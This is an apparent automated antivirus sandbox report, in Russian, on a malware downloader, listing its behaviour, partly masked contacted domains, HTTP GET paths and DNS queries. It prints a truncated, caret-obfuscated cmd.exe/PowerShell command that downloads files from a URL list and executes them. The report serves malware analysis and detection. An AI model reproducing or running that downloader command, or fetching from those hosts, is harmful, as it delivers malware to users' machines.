Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:^O/C"s^e^t ^LE^Fq= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}{^hc^t^ac^}^;kaerb;^B^MU$^ m^e^t^I-^e^k^ovnI;)^B^M^U^$^ ,^w^w^j^$(el^i^FdaolnwoD.^kC^p^$^{^yr^t{)n^PI^$^ ni^ wwj^$(hc^a^er^o^f^;'^e^x^e.^'^+V^z...
Сетевая активность
Подключается к
- 'cl#####nstruction.co.uk':80
- 'li#####ithwealth.org':80
- 'li#####ithwealth.org':443
- 'jm#######storationcenter.com':80
- 'ke####va-photo.ru':80
- 'ke####va-photo.ru':443
TCP
Запросы HTTP GET
- http://cl#####nstruction.co.uk/zNl1M7h
- http://li#####ithwealth.org/nUWbDW6
- http://jm#######storationcenter.com/kfTZ7gJ
- http://ke####va-photo.ru/iiAPFqy
Другие
- 'li#####ithwealth.org':443
- 'ke####va-photo.ru':443
UDP
- DNS ASK cl#####nstruction.co.uk
- DNS ASK li#####ithwealth.org
- DNS ASK li###upara.nl
- DNS ASK jm#######storationcenter.com
- DNS ASK ke####va-photo.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:^O/C"s^e^t ^LE^Fq= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}{^hc^t^ac^}^;kaerb;^B^MU$^ m^e^t^I-^e^k^ovnI;)^B^M^U^$^ ,^w^w^j^$(el^i^FdaolnwoD.^kC^p^$^{^yr^t{)n^PI^$^ ni^ wwj^$(hc^a^er^o^f^;'^e^x^e.^'^+V^z...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\searchprotocolhost.exe' Global\UsGthrFltPipeMssGthrPipe7_ Global\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "%...
- '<SYSTEM32>\searchfilterhost.exe' 0 508 512 520 65536 516
